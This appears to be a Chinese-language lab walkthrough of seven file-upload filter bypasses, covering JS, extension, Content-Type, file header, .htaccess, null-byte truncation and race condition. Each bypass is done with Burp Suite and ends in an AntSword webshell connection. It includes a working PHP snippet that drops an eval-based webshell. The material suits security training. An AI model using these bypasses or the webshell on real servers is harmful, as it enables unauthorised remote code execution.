一、前端JS绕过
1.修改文件后缀

2.bp抓包将muma.php.jpg改为muma.php,forward

可以看到上传成功

3.蚁剑连接,可以看到连接成功

还可以禁用前端JS
二、文件名绕过
1.bp抓包,将php改为Php

2.成功上传

3.右键图片,复制图片链接,用蚁剑连接,成功连接

还可以使用其他的扩展名绕过
三、Content-Type绕过
1.写一个muma.php

2.bp抓包,改包
将从Content-Type改为image/jpeg,然后forward

3.显示上传成功,右键复制图像链接

4.用蚁剑进行连接

连接成功
四、文件头过滤绕过
1.制作图片木马

2.上传成功

3.用蚁剑成功

五、.htaccess文件上传
1.写入一个.htaccess文件

2.制作一个图片木马

3.上传成功


4.蚁剑连接成功

六、文件截断上传
1.上传木马文件,bp抓包

2.bp改包
filename=muma.php改为muma.jpg

16进制那将aa改为00 00

3.上传成功

4.蚁剑连接成功

七·、竞争条件文件上传
1.写一个一句话木马
php
<?php
fputs(fopen("shell.php","w"),'<?php @eval($_POST["123"]);?>');
?>
2.bp抓包,发送给到intruder

3.清除所有参数,payload type 设置为:Null payloads,payload settings 设置为:continue indefitely

4.访问:http://192.168.10.132:8001/upload/uploads/竞争方式.php抓包,同样发送到intruder,重复上述操作

5.两个同时attack

写入文件成功,蚁剑连接
